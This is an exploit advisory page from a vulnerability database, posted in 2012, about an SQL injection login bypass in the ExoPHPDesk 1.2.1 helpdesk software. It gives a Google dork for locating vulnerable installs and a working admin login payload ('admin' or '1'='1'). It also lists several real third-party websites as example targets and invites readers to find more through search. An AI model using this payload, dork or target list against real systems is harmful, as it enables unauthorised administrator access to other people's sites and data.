ExoPHPDesk 1.2.1 SQL Injection

2012.05.03
Credit: L3b-r1'z
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: allintext: \"Powered by ExoPHPDesk v1.2.1\"

####### # Author : L3b-r1'z # Title : ExoPHPDesk v1.2.1 Bypass Vulnerability # Dork : allintext: "Powered by ExoPHPDesk v1.2.1" # Download : http://exoscripts.com/exohelpdesk # Email : L3br1z@gmail.com ####### # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Bypass Vuln [+] P0c : Http://exaple-site/admin.php Username : admin' or '1'='1 Password : anything Example :http://www.squashpromotion.dk/helpdesk/admin.phphttp://idigitek.com/epdesk/admin.phphttp://www.itk-solution.com/Helpdesk/admin.phphttp://boroksite.com/support/admin.php (And More In Google :D ) Proud To Be Lebanese -- L3b-r1'z . proud to be lebanese :) Sec4Ever.Com

References:

http://exoscripts.com/exohelpdesk


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top